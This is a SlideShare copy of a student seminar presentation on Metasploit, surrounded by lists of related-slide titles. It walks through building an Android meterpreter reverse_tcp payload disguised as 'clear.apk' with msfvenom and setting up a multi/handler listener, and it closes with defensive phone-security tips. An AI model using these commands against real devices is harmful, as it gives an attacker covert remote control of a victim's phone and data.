SlideShare a Scribd company logo
12
Most read
13
Most read
16
Most read
METASPLOIT
GUIDE IN CHARGE
Mr.JINSONDEVIS
PRESENTED BY
HENEL PJ
MCA LE S3
ROLLNO 23
CONTENTS
 Introduction
Kali Linux
Penetration testing
 Metasploit
Introduction to Metasploit
Advantages & Disadvantages
 Steps to Hacking Android with Metasploit
Payload File Creation
Sending payload To the Target
Running Metasploit and AttackerSetup
Commands to exploits victim’sAndroid
 Future Scope
 Conclusion
 References
INTRODUCTION ON KALI LINUX
Debian-based Linuxdistribution aimed at advanced
PenetrationTestingand SecurityAuditing.
ReleaseDate: March 13th, 2013.
Kali containsseveraltools
Information security tasks
PenetrationTesting,Securityresearch
Computer Forensicsand ReverseEngineering
Also called pentesting
Testing a computer system/network /Web application
to find vulnerabilities.
Benefits:
Intelligently manage vulnerabilities
Avoid the cost of network downtime
Penetration Testing
MAIN TERMS
EXPLOIT- a piece of code written to take advantage of a
particular vulnerability inthe system.
PAYLOAD- simplescriptsthat the hackersutilize to interact with a
hacked system.
LHOST- TheIPaddress youwant your listener to bind to.
LPORT- Theport youwantyour listener to bind to.
Meterpreter - advanced, dynamically extensible payload that
uses in memorydll injection & extended over the n/w at runtime.
METASPLOIT
penetration testing platform that enables to find,
exploit, andvalidate vulnerabilities.
Author:Rapid7
METASPLOITINTERFACES
Metasploit can be used either with Console,
command prompt or with GUI.
Msfconsole –part of metasploitframework,
provide interface with all options.
Advantages
 Open source
 Frequently updated
Disadvantages
 Difficult to learn
 Can crash your system if not used wisely
 Requires deep knowledge for exploit development
HACKINGANDROIDWITH
METASPLOIT
STEP1:OPEN THE METASPLOIT CONSOLE IN KALI
Path:Applications → Exploitation Tools → Metasploit
Some other tools
 Ezsploit : Linux bash script automation for metasploit
use to create payload for multiple platform (Taken by
Nidha)
 Armitage : GUI for metasploit framework.
(Taken by Jubin)
 TheFatRat : It is used to create a backdoor and the
backdoor is executed android device and access
control the device. (Taken by Ajil)
Fig: Metasploit console
STEP 2: TYPE THE FOLLOWING COMMAND IN THE TERMINAL
FOR CREATING THE PAYLOAD FILE
msf > msfvenom –p android/meterpreter/reverse_tcp
LHOST=192.168.43.207 LPORT=6060 > clear.apk
STEP 3: Install apk
STEP 4: USE THE “exploit/multi/handler”
Payload Handler is a module that provides all the features of the
metasploit payload system to exploit. msf > use
exploit/multi/handler
STEP 5: SET THE PAYLOAD
msf exploit(multi/handler) > set payload
android/meterpreter/reverse_tcp
STEP 6: SET THE LOCAL HOST
msf exploit(multi/handler) > set LHOST 192.168.43.207
STEP 7: SET THE LOCAL PORT
msf exploit(multi/handler) > set LPORT 6060
Metasploit seminar
STEP 8: RUN THE COMMAND “ exploit ”
msf exploit(multi/handler) > exploit
CONCLUSION
The backdoor application when installed and turned on the
mobile allows attacker to read, write and modify data. Cautions are.
Never permanently enable installing of Apps from “Unknown
sources “.
Never take your phone to important meetings or anywhere you
don't want people listening.
Keep your Android up to date.
Installing antivirus software on your Android device.
REFERENCE
www.metasploit.com
www.rapid7.com
https://tools.kali.org/exploitation-tools/metasploit-
framework
www.securitytube.net
www.google.com
www.youtube.com
THANK YOU…………
Metasploit seminar

More Related Content

PPTX
Metasploit framework in Network Security
PPTX
Metasploit
PPTX
Metasploit framwork
PDF
Metaploit
PPTX
Thick client pentesting_the-hackers_meetup_version1.0pptx
PDF
Pentest with Metasploit
PPTX
Metasploit
Metasploit framework in Network Security
Metasploit
Metasploit framwork
Metaploit
Thick client pentesting_the-hackers_meetup_version1.0pptx
Pentest with Metasploit
Metasploit

What's hot (20)

PPTX
WTF is Penetration Testing v.2
PDF
Nessus Software
PPTX
Finalppt metasploit
PPTX
Introduction to Metasploit
 
PPTX
Introduction To Exploitation & Metasploit
PPTX
OpenVAS: Vulnerability Assessment Scanner
PPTX
Metasploit (Module-1) - Getting Started With Metasploit
PPTX
Nessus-Vulnerability Tester
PPT
Penetration Testing Basics
PPTX
Demo of security tool nessus - Network vulnerablity scanner
PDF
Ch 11: Hacking Wireless Networks
PDF
Vulnerability Management
PPTX
OWASP Top 10 2021 What's New
PPTX
Introduction to penetration testing
PDF
Metasploit for Penetration Testing: Beginner Class
PPTX
Application Security Architecture and Threat Modelling
PDF
MITRE ATT&CK Framework
PPTX
7 Steps to Threat Modeling
PPTX
Understanding NMAP
WTF is Penetration Testing v.2
Nessus Software
Finalppt metasploit
Introduction to Metasploit
 
Introduction To Exploitation & Metasploit
OpenVAS: Vulnerability Assessment Scanner
Metasploit (Module-1) - Getting Started With Metasploit
Nessus-Vulnerability Tester
Penetration Testing Basics
Demo of security tool nessus - Network vulnerablity scanner
Ch 11: Hacking Wireless Networks
Vulnerability Management
OWASP Top 10 2021 What's New
Introduction to penetration testing
Metasploit for Penetration Testing: Beginner Class
Application Security Architecture and Threat Modelling
MITRE ATT&CK Framework
7 Steps to Threat Modeling
Understanding NMAP
Ad

Similar to Metasploit seminar (20)

PPTX
Lifnaaaaaa e
PPTX
Intro to exploits in metasploitand payloads in msfvenom
PDF
24 33 -_metasploit
DOCX
Lab-10 Malware Creation and Denial of Service (DoS) In t.docx
DOCX
Backtrack Manual Part7
PDF
Exploits Attack on Windows Vulnerabilities
PDF
ENPM808 Independent Study Final Report - amaster 2019
DOCX
Backtrack Manual Part6
PPT
[null]Metapwn - Pwn at a puff by Prajwal Panchmahalkar
PPTX
Metasploit - Basic and Android Demo
PPTX
Pentesting with linux
PPTX
Kali Linux - Falconer
PDF
Penetrating Windows 8 with syringe utility
PDF
Compromising windows 8 with metasploit’s exploit
PDF
Unveiling-Patchwork
PPTX
Metasploit for Web Workshop
PPTX
The FatRat
PPT
Automated Penetration Testing With The Metasploit Framework
PDF
Metasploit Humla for Beginner
Lifnaaaaaa e
Intro to exploits in metasploitand payloads in msfvenom
24 33 -_metasploit
Lab-10 Malware Creation and Denial of Service (DoS) In t.docx
Backtrack Manual Part7
Exploits Attack on Windows Vulnerabilities
ENPM808 Independent Study Final Report - amaster 2019
Backtrack Manual Part6
[null]Metapwn - Pwn at a puff by Prajwal Panchmahalkar
Metasploit - Basic and Android Demo
Pentesting with linux
Kali Linux - Falconer
Penetrating Windows 8 with syringe utility
Compromising windows 8 with metasploit’s exploit
Unveiling-Patchwork
Metasploit for Web Workshop
The FatRat
Automated Penetration Testing With The Metasploit Framework
Metasploit Humla for Beginner
Ad

Recently uploaded (20)

PDF
Anxiety Awareness Journal One Week Preview
DOCX
Boost your energy levels and Shred Weight
PPTX
A portfolio Template for Interior Designer
PPTX
Unlocking Success Through the Relentless Power of Grit
DOCX
Paulo Tuynmam: Nine Timeless Anchors of Authentic Leadership
PPTX
Commmunication in Todays world- Principles and Barriers
PDF
Top 10 Visionary Entrepreneurs to Watch in 2025
PDF
Want to Fly Like an Eagle - Leave the Chickens Behind.pdf
PDF
PLAYLISTS DEI MEGAMIX E DEEJAY PARADE DAL 1991 AL 2004 SU RADIO DEEJAY
PPT
Lesson From Geese! Understanding Teamwork
PPTX
Emotional Intelligence- Importance and Applicability
PPTX
UNIVERSAL HUMAN VALUES for NEP student .pptx
PPTX
THEORIES-PSYCH-3.pptx theory of Abraham Maslow
PDF
Lesson 4 Education for Better Work. Evaluate your training options.
PPTX
Hazards-of-Uncleanliness-Protecting-Your-Health.pptx
PDF
Why is mindset more important than motivation.pdf
PDF
SEX-GENDER-AND-SEXUALITY-LESSON-1-M (2).pdf
PDF
technical writing on emotional quotient ppt
PDF
Quiet Wins: Why the Silent Fish Survives.pdf
PDF
⚡ Prepping for grid failure_ 6 Must-Haves to Survive Blackout!.pdf
Anxiety Awareness Journal One Week Preview
Boost your energy levels and Shred Weight
A portfolio Template for Interior Designer
Unlocking Success Through the Relentless Power of Grit
Paulo Tuynmam: Nine Timeless Anchors of Authentic Leadership
Commmunication in Todays world- Principles and Barriers
Top 10 Visionary Entrepreneurs to Watch in 2025
Want to Fly Like an Eagle - Leave the Chickens Behind.pdf
PLAYLISTS DEI MEGAMIX E DEEJAY PARADE DAL 1991 AL 2004 SU RADIO DEEJAY
Lesson From Geese! Understanding Teamwork
Emotional Intelligence- Importance and Applicability
UNIVERSAL HUMAN VALUES for NEP student .pptx
THEORIES-PSYCH-3.pptx theory of Abraham Maslow
Lesson 4 Education for Better Work. Evaluate your training options.
Hazards-of-Uncleanliness-Protecting-Your-Health.pptx
Why is mindset more important than motivation.pdf
SEX-GENDER-AND-SEXUALITY-LESSON-1-M (2).pdf
technical writing on emotional quotient ppt
Quiet Wins: Why the Silent Fish Survives.pdf
⚡ Prepping for grid failure_ 6 Must-Haves to Survive Blackout!.pdf

Metasploit seminar

  • 1. METASPLOIT GUIDE IN CHARGE Mr.JINSONDEVIS PRESENTED BY HENEL PJ MCA LE S3 ROLLNO 23
  • 2. CONTENTS  Introduction Kali Linux Penetration testing  Metasploit Introduction to Metasploit Advantages & Disadvantages  Steps to Hacking Android with Metasploit Payload File Creation Sending payload To the Target Running Metasploit and AttackerSetup Commands to exploits victim’sAndroid  Future Scope  Conclusion  References
  • 3. INTRODUCTION ON KALI LINUX Debian-based Linuxdistribution aimed at advanced PenetrationTestingand SecurityAuditing. ReleaseDate: March 13th, 2013. Kali containsseveraltools Information security tasks PenetrationTesting,Securityresearch Computer Forensicsand ReverseEngineering
  • 4. Also called pentesting Testing a computer system/network /Web application to find vulnerabilities. Benefits: Intelligently manage vulnerabilities Avoid the cost of network downtime Penetration Testing
  • 5. MAIN TERMS EXPLOIT- a piece of code written to take advantage of a particular vulnerability inthe system. PAYLOAD- simplescriptsthat the hackersutilize to interact with a hacked system. LHOST- TheIPaddress youwant your listener to bind to. LPORT- Theport youwantyour listener to bind to. Meterpreter - advanced, dynamically extensible payload that uses in memorydll injection & extended over the n/w at runtime.
  • 6. METASPLOIT penetration testing platform that enables to find, exploit, andvalidate vulnerabilities. Author:Rapid7
  • 7. METASPLOITINTERFACES Metasploit can be used either with Console, command prompt or with GUI. Msfconsole –part of metasploitframework, provide interface with all options.
  • 8. Advantages  Open source  Frequently updated Disadvantages  Difficult to learn  Can crash your system if not used wisely  Requires deep knowledge for exploit development
  • 9. HACKINGANDROIDWITH METASPLOIT STEP1:OPEN THE METASPLOIT CONSOLE IN KALI Path:Applications → Exploitation Tools → Metasploit
  • 10. Some other tools  Ezsploit : Linux bash script automation for metasploit use to create payload for multiple platform (Taken by Nidha)  Armitage : GUI for metasploit framework. (Taken by Jubin)  TheFatRat : It is used to create a backdoor and the backdoor is executed android device and access control the device. (Taken by Ajil)
  • 12. STEP 2: TYPE THE FOLLOWING COMMAND IN THE TERMINAL FOR CREATING THE PAYLOAD FILE msf > msfvenom –p android/meterpreter/reverse_tcp LHOST=192.168.43.207 LPORT=6060 > clear.apk
  • 14. STEP 4: USE THE “exploit/multi/handler” Payload Handler is a module that provides all the features of the metasploit payload system to exploit. msf > use exploit/multi/handler STEP 5: SET THE PAYLOAD msf exploit(multi/handler) > set payload android/meterpreter/reverse_tcp STEP 6: SET THE LOCAL HOST msf exploit(multi/handler) > set LHOST 192.168.43.207 STEP 7: SET THE LOCAL PORT msf exploit(multi/handler) > set LPORT 6060
  • 16. STEP 8: RUN THE COMMAND “ exploit ” msf exploit(multi/handler) > exploit
  • 17. CONCLUSION The backdoor application when installed and turned on the mobile allows attacker to read, write and modify data. Cautions are. Never permanently enable installing of Apps from “Unknown sources “. Never take your phone to important meetings or anywhere you don't want people listening. Keep your Android up to date. Installing antivirus software on your Android device.